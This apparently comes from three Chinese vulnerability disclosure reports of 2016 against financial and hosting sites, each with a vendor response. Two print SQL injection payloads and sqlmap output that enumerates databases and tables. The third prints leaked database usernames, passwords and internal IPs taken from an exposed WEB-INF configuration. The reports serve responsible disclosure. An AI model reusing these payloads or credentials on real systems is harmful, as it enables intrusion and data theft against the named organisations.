漏洞详情披露状态： 2016-04-24： 细节已通知厂商并且等待厂商处理中2016-04-24： 厂商已经确认，细节仅向厂商公开2016-05-04： 细节向核心白帽子及相关领域专家公开2016-05-14： 细节向普通白帽子公开2016-05-24： 细节向实习白帽子公开2016-06-08： 细节向公众公开简要描述：上午找的两个注入，第一个脚本还在跑，就去吃饭了，回来发现已经修复了......太快了详细说明：站点：testm.10jqka.com.cnPOST内容：POST /htdocs/eq/eqadmin/index.php?act=findpass HTTP/1.1Host: testm.10jqka.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://testm.10jqka.com.cn/htdocs/eq/eqadmin/index.php?con=index&act=findpassCookie: open_menu_group_id=userManager; Hm_lvt_78c58f01938e4d85eaf619eae71b4ed1=1461131912,1461233665,1461395407,1461395436; Hm_lpvt_78c58f01938e4d85eaf619eae71b4ed1=1461395436; __qc_wId=405; pgv_pvid=8371685238; historystock=ZA; Hm_lvt_22a3c65fd214b0d5fd3a923be29458c7=1461395435; Hm_lpvt_22a3c65fd214b0d5fd3a923be29458c7=1461395435; Hm_lvt_f79b64788a4e377c608617fba4c736e2=1461395435; Hm_lpvt_f79b64788a4e377c608617fba4c736e2=1461395435; PHPSESSID=9jd4k35ljtm67g8ugtb4eit4o7Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 80username=*&submit=%E6%89%BE%E5%9B%9E%E5%AF%86%E7%A0%81漏洞证明： custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q][16:11:37] [INFO] resuming back-end DBMS 'mysql'[16:11:37] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST)Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (SELECT)Payload: username=' AND (SELECT * FROM (SELECT(SLEEP(5)))RVJH) AND 'xulI'='xulI&submit=%E6%89%BE%E5%9B%9E%E5%AF%86%E7%A0%81---[16:11:37] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.6.10back-end DBMS: MySQL 5.0.12[16:11:37] [INFO] fetching current user[16:11:37] [INFO] resumed: root@%current user: 'root@%'[16:11:37] [INFO] fetched data logged to text files under 'C:\Users\dell\.sqlmap\output\testm.10jqka.com.cn'修复方案：预编译版权声明：转载请注明来源 Vinc@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-04-24 13:00厂商回复：你好，漏洞已确认，正在进行修复，谢谢。最新状态：暂无

漏洞详情披露状态： 2016-06-20： 细节已通知厂商并且等待厂商处理中2016-06-21： 厂商已经确认，细节仅向厂商公开2016-06-21： 厂商已经修复漏洞并主动公开，细节向公众公开简要描述：rt 给个高分吧.详细说明：http://www.thfund.com.cn/天弘基金主站 http://www.thfund.com.cn//thfund/fundlist/search/api/?word=eword参数存在注入code 区域GET parameter 'word' is vulnerable. Do you want to keep testing the others (if a ny)? [y/N] y sqlmap identified the following injection point(s) with a total of 277 HTTP(s) r equests: --- Parameter: word (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: word=e%' AND 4468=4468 AND '%'=' Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SLEEP) Payload: word=e%' AND (SELECT * FROM (SELECT(SLEEP(5)))scvx) AND '%'=' --- [08:07:03] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.20 back-end DBMS: MySQL 5.0.12code 区域current user: '[email protected]/* */\x1f\x08'漏洞证明： code 区域available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] thwebcode 区域[08:18:46] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.20 back-end DBMS: MySQL 5.0.12 [08:18:46] [INFO] fetching tables for database: 'thweb' [08:18:46] [INFO] fetching number of tables for database 'thweb' [08:18:46] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [08:18:46] [INFO] retrieved: 284 [08:18:54] [INFO] retrieved: a_content_body [08:20:04] [INFO] retrieved: a_content_category [08:20:54] [INFO] retrieved: a_w_content [08:21:46] [INFO] retrieved: a_w_content_1 [08:22:07] [INFO] retrieved: aa_channel_category [08:23:29] [INFO] retrieved: aa_fundday [08:24:13] [INFO] retrieved: accesslog [08:25:00] [INFO] retrieved: actions [08:25:27] [INFO] retrieved: aliyunoss_file [08:26:35] [INFO] retrieved: authmap [08:27:07] [INFO] retrieved: batch [08:27:36] [INFO] retrieved: b表太多了 ，就不跑了 仅证明危害修复方案：参数过滤版权声明：转载请注明来源 丶n@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：12确认时间：2016-06-21 10:10厂商回复：谢谢您的提醒，我们会重视并解决最新状态：2016-06-21：已修复。

漏洞详情 披露状态： 2016-05-10： 细节已通知厂商并且等待厂商处理中 2016-05-10： 厂商已经确认，细节仅向厂商公开 2016-05-20： 细节向核心白帽子及相关领域专家公开 2016-05-30： 细节向普通白帽子公开 2016-06-09： 细节向实习白帽子公开 2016-06-24： 细节向公众公开 简要描述： 敏感信息泄露 详细说明： 关于WEB-INFWEB-INF是Java的WEB应用的安全目录。所谓安全就是客户端无法访问，只有服务端可以访问的目录。 WEB-INF目录下的敏感目录及文件： titlees目录（包含该应用核心的java类编译后的title文件及部分配置文件） lib目录（所用框架、插件或组件的架包） web.xml（重要的配置文件） ： 1、漏洞触发页面以及对应功能: http://www.xinnet.com/WEB-INF/titlees/modules/spring.xml http://www.xinnet.com/WEB-INF/web.xml 2、漏洞复现具体流程，包含具体payload和完整的数据包： 数据库配置文件： 核心数据库账号泄露，公网ip，貌似不能外联。。。。。。 code 区域#jdbc.driverClassName=com.mysql.jdbc.Driver #jdbc.url=jdbc:mysql://172.20.16.200:3306/info_pub #jdbc.username=gao #jdbc.password=gao jdbc.driverClassName=oracle.jdbc.driver.OracleDriver jdbc.url=jdbc:oracle:thin:@172.20.20.231:1521:xinnetdb jdbc.username=xinnet jdbc.password=xinnet123 #jdbc.driverClassName=oracle.jdbc.driver.OracleDriver #jdbc.url=jdbc:oracle:thin:@172.20.21.2:1521:xinnet2 #jdbc.username=xinnet #jdbc.password=xinnet 核心数据库： code 区域xinnetsql.password=g5F6JM4syneJtkAmFUC5gw== 漏洞证明： 泄露的配置文件如下: code 区域xinnetsql.password=g5F6JM4syneJtkAmFUC5gw== 修复方案： 配置加固 版权声明：转载请注明来源 D＆G@乌云 漏洞回应 厂商回应： 危害等级：高 漏洞Rank：10 确认时间：2016-05-10 13:59 厂商回复： 已经转给新网数码的人员进行处理。 最新状态： 暂无